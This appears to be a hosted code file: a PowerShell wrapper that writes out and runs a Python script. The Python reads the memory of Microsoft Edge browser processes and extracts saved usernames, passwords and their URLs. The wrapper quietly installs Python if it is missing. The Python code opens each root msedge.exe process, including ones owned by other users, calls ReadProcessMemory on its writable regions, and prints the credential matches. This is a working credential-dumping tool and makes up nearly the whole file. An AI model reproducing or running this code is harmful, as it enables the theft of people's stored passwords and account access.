Spaces:
Running
Running
File size: 8,102 Bytes
6fc7e48 157bdeb 6fc7e48 157bdeb 6fc7e48 157bdeb 6fc7e48 157bdeb 6fc7e48 157bdeb 6fc7e48 157bdeb 6fc7e48 157bdeb 6fc7e48 157bdeb 6fc7e48 157bdeb 6fc7e48 157bdeb 6fc7e48 157bdeb 6fc7e48 157bdeb 6fc7e48 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 |
$pythonCode = @'
def main():
# 管理者権限チェックをスキップ
print("\033[92m[v]\033[0m Starting script execution\n")
print("Fetching browser processes:", end="", flush=True)
total_matches = 0
shown_matches = 0
seen_strings = set()
already_checked_users = set()
process_list = []
# Get all msedge.exe processes
for proc in psutil.process_iter(['pid', 'name', 'ppid']):
try:
if proc.info['name'] and proc.info['name'].lower() == 'msedge.exe':
pid = proc.info['pid']
parent_pid = proc.info['ppid']
skip = False
# Check what process is parent
try:
parent = psutil.Process(parent_pid)
if parent.name().lower() == 'msedge.exe':
skip = True # Parent is msedge.exe → skip this child process
except (psutil.NoSuchProcess, psutil.AccessDenied):
pass # Parent may have exited → treat as root process
if skip:
continue
# The credentials are only stored at root/parent msedge.exe processes
owner = get_process_owner_from_token(pid)
process_list.append(ProcessInfo(pid, proc.info['name'], owner))
except (psutil.NoSuchProcess, psutil.AccessDenied):
continue
print(" Done.\n")
for proc in process_list:
user_process_key = f"{proc.Owner} {proc.Name}"
if user_process_key in already_checked_users:
continue
owner = proc.Owner.replace("NSC\\t1_", "")
print(f"Scanning process PID: {proc.Id}\tName: {proc.Name}\tOwner: {owner}")
process_handle = kernel32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, proc.Id)
if not process_handle:
print(f"Failed to open process: {proc.Id} {proc.Name} {proc.Owner}")
continue
# 修正: アドレスを適切に初期化
address = ctypes.c_void_p(0)
while True:
mem_info = MEMORY_BASIC_INFORMATION()
result = kernel32.VirtualQueryEx(
process_handle,
address,
ctypes.byref(mem_info),
ctypes.sizeof(MEMORY_BASIC_INFORMATION)
)
if result == 0:
break
readable = (mem_info.State == MEM_COMMIT and mem_info.Protect == PAGE_READWRITE)
if readable and mem_info.BaseAddress is not None:
region_size = mem_info.RegionSize
try:
buffer = ctypes.create_string_buffer(region_size)
except (OverflowError, MemoryError):
# バッファが作成できない場合はスキップ
address = ctypes.c_void_p(mem_info.BaseAddress + mem_info.RegionSize)
continue
bytes_read = ctypes.c_size_t(0)
if kernel32.ReadProcessMemory(
process_handle,
mem_info.BaseAddress,
buffer,
region_size,
ctypes.byref(bytes_read)
):
try:
utf8_data = buffer.raw[:bytes_read.value].decode('utf-8', errors='ignore')
except Exception:
try:
utf8_data = buffer.raw[:bytes_read.value].decode('latin-1', errors='ignore')
except Exception:
utf8_data = ""
if utf8_data:
lines = re.split(r'\r\n|\r|\n', utf8_data)
for line in lines:
if len(line) < 1: # 短すぎる行はスキップ
continue
pattern = r'[a-zA-Z]https?\x20([a-zA-ZæøåÆØÅ0-9\\\-_.@\?]{3,20})\x20([a-zA-ZæøåÆØÅ0-9#!@#\$%\^&\*\(\)_\-\+=\{\}\[\]:;<>\?/~\s]{6,40})\x20\x00'
try:
matches = re.finditer(pattern, line)
except Exception:
continue
for match in matches:
try:
username = match.group(1)
password = match.group(2)
potential_pattern = f"{username} : {password}"
url_pattern = (
r'\x00\x00\x00'
r'([A-Za-z0-9\-._~:/?#\[\]@!$&\'()*+,;=%]+)'
r'(https?)'
+ re.escape(f'\x20{username} {password}')
)
for url_match in re.finditer(url_pattern, line):
value = url_match.group(1)
combined = f"{potential_pattern} @{value}"
if combined not in seen_strings:
print(combined)
seen_strings.add(combined)
shown_matches += 1
total_matches += 1
already_checked_users.add(user_process_key)
except Exception:
continue
# 修正: 次のメモリリージョンへ移動(BaseAddressとRegionSizeがNoneでないことを確認)
if mem_info.BaseAddress is not None and mem_info.RegionSize is not None:
address = ctypes.c_void_p(mem_info.BaseAddress + mem_info.RegionSize)
else:
break
kernel32.CloseHandle(process_handle)
seen_strings.clear()
print(f"\nTotal matches found across all processes: {total_matches}. {shown_matches} shown.")
'@
$pyFile = "wp.py"
Set-Content -Path $pyFile -Value $pythonCode -Encoding UTF8
Write-Host "Saved: $pyFile"
# ===== Pythonコマンド確認 =====
$pythonCmd = $null
if (Get-Command python3 -ErrorAction SilentlyContinue) {
$pythonCmd = "python3"
}
elseif (Get-Command python -ErrorAction SilentlyContinue) {
$pythonCmd = "python"
}
# ===== Python未導入なら自動インストール =====
if (-not $pythonCmd) {
Write-Host "Python not found. Downloading..."
$installer = "$env:TEMP\python-installer.exe"
Invoke-WebRequest `
-Uri "https://www.python.org/ftp/python/3.12.3/python-3.12.3-amd64.exe" `
-OutFile $installer
Write-Host "Installing Python..."
Start-Process `
-FilePath $installer `
-ArgumentList "/quiet InstallAllUsers=1 PrependPath=1" `
-Wait
# PATH再読み込み
$env:Path = [System.Environment]::GetEnvironmentVariable(
"Path",
"Machine"
) + ";" + [System.Environment]::GetEnvironmentVariable(
"Path",
"User"
)
# 再確認
if (Get-Command python3 -ErrorAction SilentlyContinue) {
$pythonCmd = "python3"
}
elseif (Get-Command python -ErrorAction SilentlyContinue) {
$pythonCmd = "python"
}
if (-not $pythonCmd) {
Write-Error "Python installation failed."
exit 1
}
}
# ===== 実行 =====
Write-Host "Running wp.py with $pythonCmd"
& $pythonCmd $pyFile |